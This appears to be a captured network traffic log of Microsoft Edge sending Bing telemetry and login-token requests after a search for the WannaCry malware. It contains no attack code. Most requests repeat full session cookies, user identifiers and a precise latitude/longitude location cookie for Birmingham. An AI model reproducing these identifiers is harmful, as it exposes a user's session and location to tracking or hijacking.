origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.149113da
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum12%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum12%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.149113db
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f12%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f12%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.14911412
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199027.14911497
POST

https://www.bing.com/orgid/idtoken/conditional

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /orgid/idtoken/conditional HTTP/2.0
host: www.bing.com
content-length: 693
cache-control: max-age=0
ect: 4g
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
origin: https://login.microsoftonline.com
upgrade-insecure-requests: 1
dnt: 1
content-type: application/x-www-form-urlencoded
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://login.microsoftonline.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026

Response

HTTP/2.0 200

cache-control: private
content-length: 25
content-type: text/html
content-encoding: gzip
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67117bb34eff47c79849992ce5e7df44
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-CpeVbrFyYSySFR+L7oHsnqDZtwcaBdB9reI889/c3wY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: D0CB3756533949FD834B05EA4D3A63A8 Ref B: LON601060102052 Ref C: 2024-10-17T21:03:47Z
date: Thu, 17 Oct 2024 21:03:47 GMT
set-cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE; expires=Tue, 11-Nov-2025 21:03:47 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199027.1491147c
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267117bb001b14002a55ff298bb5ee315%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1729199025557%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267117bb001b14002a55ff298bb5ee315%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1729199025557%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199025573%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199025573%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199025573%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199025573%2C%22Name%22%3A%22ShowBubble%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199025582%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199025615%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199025752%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1729199025820%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SuppressingFeature%22%3A%22wikiWidget%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1729199025886%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22wikiWidget%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026343%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267117bb001b14002a55ff298bb5ee315%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1729199025557%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267117bb001b14002a55ff298bb5ee315%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1729199025557%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199025573%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199025573%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199025573%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1729199025573%2C%22Name%22%3A%22ShowBubble%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199025582%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199025615%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199025752%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1729199025820%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SuppressingFeature%22%3A%22wikiWidget%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1729199025886%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22wikiWidget%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026343%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
